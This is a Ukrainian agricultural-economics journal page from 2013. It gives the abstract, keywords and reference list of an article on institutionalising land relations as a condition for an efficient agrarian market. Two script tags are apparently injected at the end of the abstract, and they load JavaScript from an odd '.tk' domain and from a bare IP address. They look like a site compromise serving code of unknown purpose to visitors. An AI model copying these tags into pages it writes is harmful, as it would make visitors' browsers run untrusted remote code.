ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 330.341:338.432
Інституціональні проблеми розвитку аграрної сфери

Інституціоналізація земельних відносин як умова ефективного функціонування аграрного ринку / Прилуцький А. М. // Економіка АПК. - 2013. - № 1 - С. 113

Розкрито вплив інституціоналізації на формування аграрного ринку. Обгрунтовано заходи, спрямовані на підвищення ефективності функціонування аграрного ринку. Окреслено напрями подальших наукових розробок, результати яких сприятимуть ефективному здійсненню цього процесу. Бібліогр.: 14.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: аграрна політика, аграрний ринок, інститут, інституції, ціноутворення, конкуренція, ефективність

Список використаних джерел

 1. Бойко Л.М. Регулювання земельних відносин у сільському господарстві: моногр. / Л. М. Бойко. - К. : ННЦ ІАЕ, 2011. - С.75.
 2. Гайдуцький П.І. Про основні засади реформування системи державної підтримки сільського господарства та сільської території / П.І. Гайдуцький // Економіка АПК. - 2005. - № 3. - С. 43-48.
 3. Данкевич А.С. Розвиток інтегрованих структур у сільському господарстві : моногр. / А.С. Данкевич - К.: ННЦ ІАЕ, 2011. - С. 287. Дем ’яненко М.Я. Фінансові проблеми формування та розвитку аграрного ринку // М.Я. Дем’яненко. - К. : Українська академія аграрних наук. ННЦ ІАЕ., 2007. - С. 3.
 4. Заяць ВМ. Розвиток ринку сільськогосподарських земель: монографія / В.М. Заєць. - К.: ННЦ ІАЕ, 2011. - С. 3.
 5. Зінчук Т. Європейський вектор розвитку агробізнесу / Т. Зінчук // Актуальні проблеми міжнародних відносин: зб. наук. праць. Вип. 105, ч. II (у двох частинах). - К.: Київський національний ун-т імені Тараса Шевченка. Інститут міжнародних відносин, 2012. - С. 59.
 6. Інноваційна діяльність в аграрній сфері : інституціональний аспект : моногр. / [Саблук П.Т., Шпикуляк О.Г., Курило Л.І. та ін.] - К. : ННЦ ІАЕ, 2010. - С. 20.
 7. Капсаее Ю.Ш. Методология институционализма при исследовании трансформаций российской экономики [Электронный ресурс] / Ю.Ш. Капсаев. - Режим доступа : http//www/ekonom.erd.ru.
 8. Коваленко Ю.С. Концептуальні засади та ескізний законопроект Закону України «Про організацію управління аграрним ринком» / Ю.С. Коваленко. - К.: ННЦ і ІАЕ, 2006. - С. 50.
 9. Кьостер, Ульріх. Основи аналізу аграрного ринку / наук. ред. пер. О. Нів’євський. - К. : Вид-во АДЕФ - Україна, 2012. - С. 125-126.
 10. Саблук П.Т. Розвиток земельних відносин в Україні / П.Т. Саблук. - К. : ННЦ ІАЕ, 2006. - С. 173.
 11. Тимченко С. Земельная реформа - это гигантский шаг вперед для каждого агрария и всей страны в целом / С. Тимченко // Сегодня. - 16 нояб. 2011. - С. 11.
 12. Шпикуляк О.Г. Інституції у розвитку та регулюванні аграрного ринку: моногр. / О.Г. Шпикуляк. - К.: ННЦ ІАЕ, 2006. - С. 290.
 13. ЯкубенкоВД. Базисні інститути у трансформаційній економіці : моногр. / В.Д. Якубенко. - К. : КНЕХ, 2004. - С. 34.
 14. Padberg D., Ritson C. and Albisu L., (eds). Agrofood marketing. Walling-ford: CAB International. - 492 p.
Читати статтю: 13_01_17.pdf